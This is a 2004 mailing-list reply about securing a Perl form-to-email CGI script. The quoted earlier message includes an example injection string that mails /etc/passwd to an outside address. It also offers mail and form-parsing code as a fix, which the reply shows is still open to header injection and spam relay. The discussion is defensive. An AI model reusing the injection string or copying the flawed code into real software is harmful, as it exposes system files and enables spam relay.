RE: Secure Form Script?

From: Tim Greer (chatmaster_at_charter.net)
Date: 05/16/04

  • Next message: Glynn Clements: "RE: Secure Form Script?" 
    To: Runion Mark A "FGA DOIM WEBMASTER(ctr)" <mark.runion@us.army.mil>
Date: 15 May 2004 23:53:13 -0700

    On Fri, 2004-05-14 at 11:58, Runion Mark A FGA DOIM WEBMASTER(ctr)
    wrote:
    > Because when they hijack the input to a sendmail command you generally see
    > something like this:
    > exec '$ sendmail $string';
    > And when the actual string looks something like:
    > exec '$ sendmail | sendmail -f /etc/passwd to@me.com';
    >
    > If you setup a program to vet the input or use a secured shell to operate
    > your mail program this can be ignored. Meaning compile your own without the
    > snazzy pipes, stops, or other functions one typically finds in all the
    > shells. For example instead of using direct executes, just send the email.
    > Try something like this instead:
    >
    > sub sendmail {
    > local $mailto = shift @_;
    > local $mailprog = "/usr/bin/mailx";
    > local $mailfrom = "Your program";
    >
    > # Open The Mail Program
    > open(MAIL,"|$mailprog -t") || die "Content-type: text/html\n\nSENDMAIL
    > ERROR: Please contact the <a href=\"mailto:$webmaster\">You</a>.";
    >
    > print MAIL "From: Your site\n";
    > print MAIL "To: $mailto\n";
    > print MAIL "Subject: Your subject $Form{subject},";
    > print MAIL " $Form{first_name}\n\n";
    > print MAIL
    > "---------------------------------------------------------------------\n";
    > print MAIL "FIRSTN: $Form{first_name}\n";
    > print MAIL "Systems List: $Form{system_list}\n\n";
    >
    > close MAIL;
    > return 0;
    > }
    >
    >
    > If the incoming data is highly suspicious try something like:
    > $Form{$value} =~ s/\|//g;
    >
    > So in a parsing function you might do this:
    > sub parse_form {
    > # Hash form of data is good
    > local $buffer = "";
    >
    > # Get the input
    > read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
    >
    > # Split the name-value pairs
    > @pairs = split(/&/, $buffer);
    >
    > foreach $pair (@pairs) {
    > local($name, $value) = split(/=/, $pair);
    > # Gets rid of any "junk"
    > $name =~ tr/+/ /;
    > $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    > $value =~ tr/+/ /;
    > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    > $value =~ s/<!--(.|\n)*-->//g; # Clean it up... This is the same
    >
    > # Associates a name with a value
    > if ($value ne '') {
    > $Form{$name} = $value;
    > }
    > }
    > }
    > -
    > Mark Runion
    >
    > /*
    > "So far beyond cutting edge the blade is null event horizon."
    > */

    The script example above would allow a spammer to pass in their
    own "subject" argument and effectively CC: and BCC: to other
    addresses, as well as terminate the email early with a .dot+new line
    to override your script's settings. Thus, it could be easily hijacked
    to relay spam through the script. Just removing pipe's isn't enough.
    Further, I'm not sure the purpose of your email script "cleaning up"
    HTML comment tags--unless you are going to view the email text on
    a page that will somehow execute SSI tags!?? I don't mean to knock
    your post, but just letting you know that you've explicitly allowed
    spammers the ability to relay through the script you exampled. 

    -- 
Regards,
Tim Greer
  • Next message: Glynn Clements: "RE: Secure Form Script?"